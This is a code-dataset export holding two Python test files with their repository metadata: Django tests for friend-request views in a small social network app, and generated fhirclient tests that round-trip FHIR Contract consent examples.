| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
38a6e0cc3b6f365c229b1798a489dd83620e615a
| 6,781
|
py
|
Python
|
Net640/apps/friends/tests/test_views.py
|
86Ilya/net640kb
|
6724f3da3b678b637e0e776ee0d4953753ee2e05
|
[
"MIT"
] | 1
|
2019-06-18T09:50:29.000Z
|
2019-06-18T09:50:29.000Z
|
Net640/apps/friends/tests/test_views.py
|
86Ilya/net640kb
|
6724f3da3b678b637e0e776ee0d4953753ee2e05
|
[
"MIT"
] | 10
|
2019-12-24T07:05:29.000Z
|
2022-02-10T07:42:44.000Z
|
Net640/apps/friends/tests/test_views.py
|
86Ilya/net640kb
|
6724f3da3b678b637e0e776ee0d4953753ee2e05
|
[
"MIT"
] | null | null | null |
from uuid import uuid1
from django.test import TestCase, Client
from django.urls import reverse
from Net640.apps.user_profile.models import User
from Net640.apps.user_profile.models import RELATIONSHIP_FRIENDS, RELATIONSHIP_REQUEST_HAS_SENT
from Net640.apps.user_profile.models import RELATIONSHIP_WAITING_FOR_ACCEPT, NO_RELATIONSHIP
class TestFriendsView(TestCase):
    """Integration tests for the friends views: sending, cancelling and
    accepting friendship requests between two users.

    Repeated setup/assertion sequences are factored into private helpers;
    the public test methods and the behavior they verify are unchanged.
    """

    password = '12345678'

    def setUp(self):
        # Two active users with random (uuid-based) names so runs don't collide.
        self.user1 = self._make_user()
        self.user2 = self._make_user()

    def _make_user(self):
        """Create, save and return an active user with a unique username."""
        random_name = str(uuid1())
        user = User(username=random_name, email=random_name + '@m.ru', is_active=True)
        user.set_password(self.password)
        user.save()
        return user

    def _send_request(self, client):
        """Log user1 in on *client*, send a friendship request to user2 and
        assert both sides see the pending state. Returns the response so
        callers can inspect its JSON payload.
        """
        client.login(username=self.user1.username, password=self.password)
        response = client.post(reverse('friends:user_view', kwargs={'user_id': self.user2.id}), {'action': 'add'})
        self.assertEqual(response.status_code, 200)
        self.user1.refresh_from_db()
        self.user2.refresh_from_db()
        self.assertEqual(self.user1.check_relationship(self.user2), RELATIONSHIP_REQUEST_HAS_SENT)
        self.assertEqual(self.user2.check_relationship(self.user1), RELATIONSHIP_WAITING_FOR_ACCEPT)
        return response

    def _accept_as_user2(self, client):
        """Log user2 in on *client*, accept user1's request and assert both
        sides now report RELATIONSHIP_FRIENDS."""
        client.login(username=self.user2.username, password=self.password)
        response = client.post(reverse('friends:my_friends'), {'action': 'accept', 'user_id': self.user1.id})
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.json()['relationship_status'], RELATIONSHIP_FRIENDS)
        self.user1.refresh_from_db()
        self.user2.refresh_from_db()
        self.assertEqual(self.user1.check_relationship(self.user2), RELATIONSHIP_FRIENDS)
        self.assertEqual(self.user2.check_relationship(self.user1), RELATIONSHIP_FRIENDS)

    def _assert_no_relationship(self, response):
        """Assert *response* reports NO_RELATIONSHIP and that both users
        agree after a database refresh."""
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.json()['relationship_status'], NO_RELATIONSHIP)
        self.user1.refresh_from_db()
        self.user2.refresh_from_db()
        self.assertEqual(self.user1.check_relationship(self.user2), NO_RELATIONSHIP)
        self.assertEqual(self.user2.check_relationship(self.user1), NO_RELATIONSHIP)

    def test_view_send_request_for_relationship(self):
        """Sending a request puts the pair into sent/waiting states."""
        client = Client()
        response = self._send_request(client)
        self.assertEqual(response.json()['relationship_status'], RELATIONSHIP_REQUEST_HAS_SENT)

    def test_view_cancel_own_send_request_for_relationship(self):
        """The sender can cancel their own pending request."""
        client = Client()
        self._send_request(client)
        response = client.post(reverse('friends:my_friends'), {'action': 'cancel', 'user_id': self.user2.id})
        self._assert_no_relationship(response)

    def test_view_cancel_foreign_send_request_for_relationship(self):
        """The recipient can cancel (decline) a request sent to them."""
        client = Client()
        self._send_request(client)
        client.login(username=self.user2.username, password=self.password)
        response = client.post(reverse('friends:my_friends'), {'action': 'cancel', 'user_id': self.user1.id})
        self._assert_no_relationship(response)

    def test_add_to_friends(self):
        """Accepting a request makes both users friends of each other."""
        client = Client()
        self._send_request(client)
        self._accept_as_user2(client)
        self.assertEqual(self.user1.get_friends()[0].username, self.user2.username)
        self.assertEqual(self.user2.get_friends()[0].username, self.user1.username)

    def test_remove_from_friends(self):
        """Cancelling an established friendship removes it for both users."""
        client = Client()
        self._send_request(client)
        self._accept_as_user2(client)
        response = client.post(reverse('friends:my_friends'), {'action': 'cancel', 'user_id': self.user1.id})
        self._assert_no_relationship(response)
| 50.604478
| 114
| 0.725262
| 830
| 6,781
| 5.693976
| 0.084337
| 0.083792
| 0.088447
| 0.071942
| 0.922556
| 0.884046
| 0.884046
| 0.876217
| 0.85548
| 0.85548
| 0
| 0.024365
| 0.152632
| 6,781
| 133
| 115
| 50.984962
| 0.79812
| 0
| 0
| 0.76699
| 0
| 0
| 0.071081
| 0
| 0
| 0
| 0
| 0
| 0.368932
| 1
| 0.058252
| false
| 0.106796
| 0.058252
| 0
| 0.135922
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
38cfd3cf8a791a1eec5bb4e14ccb125df8439b3a
| 16,331
|
py
|
Python
|
rdr_service/lib_fhir/fhirclient_3_0_0/models/contract_tests.py
|
all-of-us/raw-data-repository
|
d28ad957557587b03ff9c63d55dd55e0508f91d8
|
[
"BSD-3-Clause"
] | 39
|
2017-10-13T19:16:27.000Z
|
2021-09-24T16:58:21.000Z
|
rdr_service/lib_fhir/fhirclient_3_0_0/models/contract_tests.py
|
all-of-us/raw-data-repository
|
d28ad957557587b03ff9c63d55dd55e0508f91d8
|
[
"BSD-3-Clause"
] | 312
|
2017-09-08T15:42:13.000Z
|
2022-03-23T18:21:40.000Z
|
rdr_service/lib_fhir/fhirclient_3_0_0/models/contract_tests.py
|
all-of-us/raw-data-repository
|
d28ad957557587b03ff9c63d55dd55e0508f91d8
|
[
"BSD-3-Clause"
] | 19
|
2017-09-15T13:58:00.000Z
|
2022-02-07T18:33:20.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 3.0.0.11832 on 2017-03-22.
# 2017, SMART Health IT.
import io
import json
import os
import unittest
from . import contract
from .fhirdate import FHIRDate
class ContractTests(unittest.TestCase):
    """Round-trip tests for the FHIR Contract resource model.

    Generated from FHIR 3.0.0.11832 example resources: each testContractN
    loads an example JSON file, checks its parsed field values via the
    matching implContractN, serializes the model back with as_json(), and
    re-checks the re-parsed instance. Do not hand-edit the literal values —
    they mirror the official FHIR example fixtures.
    """

    def instantiate_from(self, filename):
        """Load *filename* (relative to FHIR_UNITTEST_DATADIR, or the
        current directory when unset) and parse it as a Contract."""
        datadir = os.environ.get('FHIR_UNITTEST_DATADIR') or ''
        with io.open(os.path.join(datadir, filename), 'r', encoding='utf-8') as handle:
            js = json.load(handle)
            self.assertEqual("Contract", js["resourceType"])
        return contract.Contract(js)

    def testContract1(self):
        """contract-example-42cfr-part2.json survives a JSON round trip."""
        inst = self.instantiate_from("contract-example-42cfr-part2.json")
        self.assertIsNotNone(inst, "Must have instantiated a Contract instance")
        self.implContract1(inst)
        js = inst.as_json()
        self.assertEqual("Contract", js["resourceType"])
        inst2 = contract.Contract(js)
        self.implContract1(inst2)

    def implContract1(self, inst):
        """Field-by-field checks for the 42 CFR Part 2 consent example."""
        # Agents: recipient and sender of restricted health information.
        self.assertEqual(inst.agent[0].role[0].coding[0].code, "IR")
        self.assertEqual(inst.agent[0].role[0].coding[0].display, "Recipient")
        self.assertEqual(inst.agent[0].role[0].coding[0].system, "http://org.mdhhs.fhir.consent-actor-type")
        self.assertEqual(inst.agent[0].role[0].text, "Recipient of restricted health information")
        self.assertEqual(inst.agent[1].role[0].coding[0].code, "IS")
        self.assertEqual(inst.agent[1].role[0].coding[0].display, "Sender")
        self.assertEqual(inst.agent[1].role[0].coding[0].system, "http://org.mdhhs.fhir.consent-actor-type")
        self.assertEqual(inst.agent[1].role[0].text, "Sender of restricted health information")
        self.assertEqual(inst.id, "C-2121")
        self.assertEqual(inst.issued.date, FHIRDate("2031-11-01T21:18:27-04:00").date)
        self.assertEqual(inst.issued.as_json(), "2031-11-01T21:18:27-04:00")
        self.assertEqual(inst.legal[0].contentAttachment.contentType, "application/pdf")
        self.assertEqual(inst.legal[0].contentAttachment.language, "en-US")
        self.assertEqual(inst.legal[0].contentAttachment.title, "MDHHS-5515 Consent To Share Your Health Information")
        self.assertEqual(inst.legal[0].contentAttachment.url, "http://org.mihin.ecms/ConsentDirective-2121")
        self.assertEqual(inst.meta.lastUpdated.date, FHIRDate("2016-07-19T18:18:42.108-04:00").date)
        self.assertEqual(inst.meta.lastUpdated.as_json(), "2016-07-19T18:18:42.108-04:00")
        self.assertEqual(inst.meta.versionId, "1")
        # Security labels: confidentiality, sensitivity and handling codes.
        self.assertEqual(inst.securityLabel[0].code, "R")
        self.assertEqual(inst.securityLabel[0].display, "Restricted")
        self.assertEqual(inst.securityLabel[0].system, "http://hl7.org/fhir/v3/Confidentiality")
        self.assertEqual(inst.securityLabel[1].code, "ETH")
        self.assertEqual(inst.securityLabel[1].display, "substance abuse information sensitivity")
        self.assertEqual(inst.securityLabel[1].system, "http://hl7.org/fhir/v3/ActCode")
        self.assertEqual(inst.securityLabel[2].code, "42CFRPart2")
        self.assertEqual(inst.securityLabel[2].system, "http://hl7.org/fhir/v3/ActCode")
        self.assertEqual(inst.securityLabel[3].code, "TREAT")
        self.assertEqual(inst.securityLabel[3].display, "treatment")
        self.assertEqual(inst.securityLabel[3].system, "http://hl7.org/fhir/v3/ActReason")
        self.assertEqual(inst.securityLabel[4].code, "HPAYMT")
        self.assertEqual(inst.securityLabel[4].display, "healthcare payment")
        self.assertEqual(inst.securityLabel[4].system, "http://hl7.org/fhir/v3/ActReason")
        self.assertEqual(inst.securityLabel[5].code, "HOPERAT")
        self.assertEqual(inst.securityLabel[5].display, "healthcare operations")
        self.assertEqual(inst.securityLabel[5].system, "http://hl7.org/fhir/v3/ActReason")
        self.assertEqual(inst.securityLabel[6].code, "PERSISTLABEL")
        self.assertEqual(inst.securityLabel[6].display, "persist security label")
        self.assertEqual(inst.securityLabel[6].system, "http://hl7.org/fhir/v3/ActCode")
        self.assertEqual(inst.securityLabel[7].code, "PRIVMARK")
        self.assertEqual(inst.securityLabel[7].display, "privacy mark")
        self.assertEqual(inst.securityLabel[7].system, "http://hl7.org/fhir/v3/ActCode")
        self.assertEqual(inst.securityLabel[8].code, "NORDSCLCD")
        self.assertEqual(inst.securityLabel[8].display, "no redisclosure without consent directive")
        self.assertEqual(inst.securityLabel[8].system, "http://hl7.org/fhir/v3/ActCode")
        # Signer: the patient self-signing the consent directive.
        self.assertEqual(inst.signer[0].signature[0].type[0].code, "1.2.840.10065.1.12.1.1")
        self.assertEqual(inst.signer[0].signature[0].type[0].system, "urn:iso-astm:E1762-95:2013")
        self.assertEqual(inst.signer[0].signature[0].when.date, FHIRDate("2017-02-08T10:57:34+01:00").date)
        self.assertEqual(inst.signer[0].signature[0].when.as_json(), "2017-02-08T10:57:34+01:00")
        self.assertEqual(inst.signer[0].type.code, "SELF")
        self.assertEqual(inst.signer[0].type.system, "http://org.mdhhs.fhir.consent-signer-type")
        self.assertEqual(inst.subType[0].coding[0].code, "MDHHS-5515")
        self.assertEqual(inst.subType[0].coding[0].display, "Michigan MDHHS-5515 Consent to Share Behavioral Health Information for Care Coordination Purposes")
        self.assertEqual(inst.subType[0].coding[0].system, "http://hl7.org/fhir/consentcategorycodes")
        self.assertEqual(inst.text.status, "generated")
        self.assertEqual(inst.type.coding[0].code, "OPTIN")
        self.assertEqual(inst.type.coding[0].system, "http://org.mdhhs.fhir.consentdirective-type")
        self.assertEqual(inst.type.text, "Opt-in consent directive")

    def testContract2(self):
        """contract-example.json survives a JSON round trip."""
        inst = self.instantiate_from("contract-example.json")
        self.assertIsNotNone(inst, "Must have instantiated a Contract instance")
        self.implContract2(inst)
        js = inst.as_json()
        self.assertEqual("Contract", js["resourceType"])
        inst2 = contract.Contract(js)
        self.implContract2(inst2)

    def implContract2(self, inst):
        """Field-by-field checks for the minimal contract example."""
        self.assertEqual(inst.id, "C-123")
        self.assertEqual(inst.identifier.system, "http://happyvalley.com/contract")
        self.assertEqual(inst.identifier.value, "12347")
        self.assertEqual(inst.text.div, "<div xmlns=\"http://www.w3.org/1999/xhtml\">A human-readable rendering of the contract</div>")
        self.assertEqual(inst.text.status, "generated")

    def testContract3(self):
        """pcd-example-notAuthor.json survives a JSON round trip."""
        inst = self.instantiate_from("pcd-example-notAuthor.json")
        self.assertIsNotNone(inst, "Must have instantiated a Contract instance")
        self.implContract3(inst)
        js = inst.as_json()
        self.assertEqual("Contract", js["resourceType"])
        inst2 = contract.Contract(js)
        self.implContract3(inst2)

    def implContract3(self, inst):
        """Checks for the 'withhold data authored by actor' consent example."""
        self.assertEqual(inst.friendly[0].contentAttachment.title, "The terms of the consent in friendly consumer speak.")
        self.assertEqual(inst.id, "pcd-example-notAuthor")
        self.assertEqual(inst.issued.date, FHIRDate("2015-11-18").date)
        self.assertEqual(inst.issued.as_json(), "2015-11-18")
        self.assertEqual(inst.legal[0].contentAttachment.title, "The terms of the consent in lawyer speak.")
        self.assertEqual(inst.subType[0].coding[0].code, "Opt-In")
        self.assertEqual(inst.subType[0].coding[0].display, "Default Authorization with exceptions.")
        self.assertEqual(inst.subType[0].coding[0].system, "http://www.infoway-inforoute.ca.org/Consent-subtype-codes")
        self.assertEqual(inst.term[0].text, "Withhold all data authored by Good Health provider.")
        self.assertEqual(inst.term[0].type.coding[0].code, "withhold-authored-by")
        self.assertEqual(inst.term[0].type.coding[0].display, "Withhold all data authored by specified actor entity.")
        self.assertEqual(inst.term[0].type.coding[0].system, "http://example.org/fhir/consent-term-type-codes")
        self.assertEqual(inst.text.status, "generated")
        self.assertEqual(inst.type.coding[0].code, "57016-8")
        self.assertEqual(inst.type.coding[0].system, "http://loinc.org")

    def testContract4(self):
        """pcd-example-notLabs.json survives a JSON round trip."""
        inst = self.instantiate_from("pcd-example-notLabs.json")
        self.assertIsNotNone(inst, "Must have instantiated a Contract instance")
        self.implContract4(inst)
        js = inst.as_json()
        self.assertEqual("Contract", js["resourceType"])
        inst2 = contract.Contract(js)
        self.implContract4(inst2)

    def implContract4(self, inst):
        """Checks for the 'withhold orders and results' consent example."""
        self.assertEqual(inst.friendly[0].contentAttachment.title, "The terms of the consent in friendly consumer speak.")
        self.assertEqual(inst.id, "pcd-example-notLabs")
        self.assertEqual(inst.issued.date, FHIRDate("2014-08-17").date)
        self.assertEqual(inst.issued.as_json(), "2014-08-17")
        self.assertEqual(inst.legal[0].contentAttachment.title, "The terms of the consent in lawyer speak.")
        self.assertEqual(inst.subType[0].coding[0].code, "Opt-In")
        self.assertEqual(inst.subType[0].coding[0].display, "Default Authorization with exceptions.")
        self.assertEqual(inst.subType[0].coding[0].system, "http://www.infoway-inforoute.ca.org/Consent-subtype-codes")
        # Two terms: withhold ProcedureRequest orders and DiagnosticReport results.
        self.assertEqual(inst.term[0].subType.coding[0].code, "ProcedureRequest")
        self.assertEqual(inst.term[0].subType.coding[0].system, "http://hl7.org/fhir/resource-types")
        self.assertEqual(inst.term[0].text, "Withhold orders from any provider.")
        self.assertEqual(inst.term[0].type.coding[0].code, "withhold-object-type")
        self.assertEqual(inst.term[0].type.coding[0].system, "http://example.org/fhir/consent-term-type-codes")
        self.assertEqual(inst.term[1].subType.coding[0].code, "DiagnosticReport")
        self.assertEqual(inst.term[1].subType.coding[0].system, "http://hl7.org/fhir/resource-types")
        self.assertEqual(inst.term[1].text, "Withhold order results from any provider.")
        self.assertEqual(inst.term[1].type.coding[0].code, "withhold-object-type")
        self.assertEqual(inst.term[1].type.coding[0].system, "http://example.org/fhir/consent-term-type-codes")
        self.assertEqual(inst.text.status, "generated")
        self.assertEqual(inst.type.coding[0].code, "57016-8")
        self.assertEqual(inst.type.coding[0].system, "http://loinc.org")

    def testContract5(self):
        """pcd-example-notOrg.json survives a JSON round trip."""
        inst = self.instantiate_from("pcd-example-notOrg.json")
        self.assertIsNotNone(inst, "Must have instantiated a Contract instance")
        self.implContract5(inst)
        js = inst.as_json()
        self.assertEqual("Contract", js["resourceType"])
        inst2 = contract.Contract(js)
        self.implContract5(inst2)

    def implContract5(self, inst):
        """Checks for the 'withhold from organization' consent example."""
        self.assertEqual(inst.friendly[0].contentAttachment.title, "The terms of the consent in friendly consumer speak.")
        self.assertEqual(inst.id, "pcd-example-notOrg")
        self.assertEqual(inst.issued.date, FHIRDate("2015-11-18").date)
        self.assertEqual(inst.issued.as_json(), "2015-11-18")
        self.assertEqual(inst.legal[0].contentAttachment.title, "The terms of the consent in lawyer speak.")
        self.assertEqual(inst.subType[0].coding[0].code, "Opt-In")
        self.assertEqual(inst.subType[0].coding[0].display, "Default Authorization with exceptions.")
        self.assertEqual(inst.subType[0].coding[0].system, "http://www.infoway-inforoute.ca.org/Consent-subtype-codes")
        self.assertEqual(inst.term[0].text, "Withhold this order and any results or related objects from any provider.")
        self.assertEqual(inst.term[0].type.coding[0].code, "withhold-from")
        self.assertEqual(inst.term[0].type.coding[0].display, "Withhold all data from specified actor entity.")
        self.assertEqual(inst.term[0].type.coding[0].system, "http://example.org/fhir/consent-term-type-codes")
        self.assertEqual(inst.text.status, "generated")
        self.assertEqual(inst.type.coding[0].code, "57016-8")
        self.assertEqual(inst.type.coding[0].system, "http://loinc.org")

    def testContract6(self):
        """pcd-example-notThem.json survives a JSON round trip."""
        inst = self.instantiate_from("pcd-example-notThem.json")
        self.assertIsNotNone(inst, "Must have instantiated a Contract instance")
        self.implContract6(inst)
        js = inst.as_json()
        self.assertEqual("Contract", js["resourceType"])
        inst2 = contract.Contract(js)
        self.implContract6(inst2)

    def implContract6(self, inst):
        """Checks for the 'withhold from specified practitioner' example."""
        self.assertEqual(inst.friendly[0].contentAttachment.title, "The terms of the consent in friendly consumer speak.")
        self.assertEqual(inst.id, "pcd-example-notThem")
        self.assertEqual(inst.issued.date, FHIRDate("2015-11-18").date)
        self.assertEqual(inst.issued.as_json(), "2015-11-18")
        self.assertEqual(inst.legal[0].contentAttachment.title, "The terms of the consent in lawyer speak.")
        # This example also carries a covered-party signature.
        self.assertEqual(inst.signer[0].signature[0].type[0].code, "1.2.840.10065.1.12.1.1")
        self.assertEqual(inst.signer[0].signature[0].type[0].system, "urn:iso-astm:E1762-95:2013")
        self.assertEqual(inst.signer[0].signature[0].when.date, FHIRDate("2013-06-08T10:57:34-07:00").date)
        self.assertEqual(inst.signer[0].signature[0].when.as_json(), "2013-06-08T10:57:34-07:00")
        self.assertEqual(inst.signer[0].type.code, "COVPTY")
        self.assertEqual(inst.signer[0].type.system, "http://www.hl7.org/fhir/contractsignertypecodes")
        self.assertEqual(inst.subType[0].coding[0].code, "Opt-In")
        self.assertEqual(inst.subType[0].coding[0].display, "Default Authorization with exceptions.")
        self.assertEqual(inst.subType[0].coding[0].system, "http://www.infoway-inforoute.ca.org/Consent-subtype-codes")
        self.assertEqual(inst.term[0].text, "Withhold this order and any results or related objects from specified nurse provider.")
        self.assertEqual(inst.term[0].type.coding[0].code, "withhold-from")
        self.assertEqual(inst.term[0].type.coding[0].display, "Withhold all data from specified actor entity.")
        self.assertEqual(inst.term[0].type.coding[0].system, "http://example.org/fhir/consent-term-type-codes")
        self.assertEqual(inst.text.status, "generated")
        self.assertEqual(inst.type.coding[0].code, "57016-8")
        self.assertEqual(inst.type.coding[0].system, "http://loinc.org")

    def testContract7(self):
        """pcd-example-notThis.json survives a JSON round trip."""
        inst = self.instantiate_from("pcd-example-notThis.json")
        self.assertIsNotNone(inst, "Must have instantiated a Contract instance")
        self.implContract7(inst)
        js = inst.as_json()
        self.assertEqual("Contract", js["resourceType"])
        inst2 = contract.Contract(js)
        self.implContract7(inst2)

    def implContract7(self, inst):
        """Checks for the 'withhold identified object and related' example."""
        self.assertEqual(inst.friendly[0].contentAttachment.title, "The terms of the consent in friendly consumer speak.")
        self.assertEqual(inst.id, "pcd-example-notThis")
        self.assertEqual(inst.issued.date, FHIRDate("2015-11-18").date)
        self.assertEqual(inst.issued.as_json(), "2015-11-18")
        self.assertEqual(inst.legal[0].contentAttachment.title, "The terms of the consent in lawyer speak.")
        self.assertEqual(inst.subType[0].coding[0].code, "Opt-In")
        self.assertEqual(inst.subType[0].coding[0].display, "Default Authorization with exceptions.")
        self.assertEqual(inst.subType[0].coding[0].system, "http://www.infoway-inforoute.ca.org/Consent-subtype-codes")
        self.assertEqual(inst.term[0].text, "Withhold this order and any results or related objects from any provider.")
        self.assertEqual(inst.term[0].type.coding[0].code, "withhold-identified-object-and-related")
        self.assertEqual(inst.term[0].type.coding[0].display, "Withhold the identified object and any other resources that are related to this object.")
        self.assertEqual(inst.term[0].type.coding[0].system, "http://example.org/fhir/consent-term-type-codes")
        self.assertEqual(inst.text.status, "generated")
        self.assertEqual(inst.type.coding[0].code, "57016-8")
        self.assertEqual(inst.type.coding[0].system, "http://loinc.org")
| 63.29845
| 160
| 0.692915
| 2,143
| 16,331
| 5.268315
| 0.125525
| 0.208592
| 0.250753
| 0.073694
| 0.824092
| 0.745084
| 0.718246
| 0.662356
| 0.625066
| 0.603632
| 0
| 0.044444
| 0.151307
| 16,331
| 257
| 161
| 63.544747
| 0.77013
| 0.006981
| 0
| 0.417778
| 1
| 0
| 0.285979
| 0.034483
| 0
| 0
| 0
| 0
| 0.728889
| 1
| 0.066667
| false
| 0
| 0.026667
| 0
| 0.102222
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.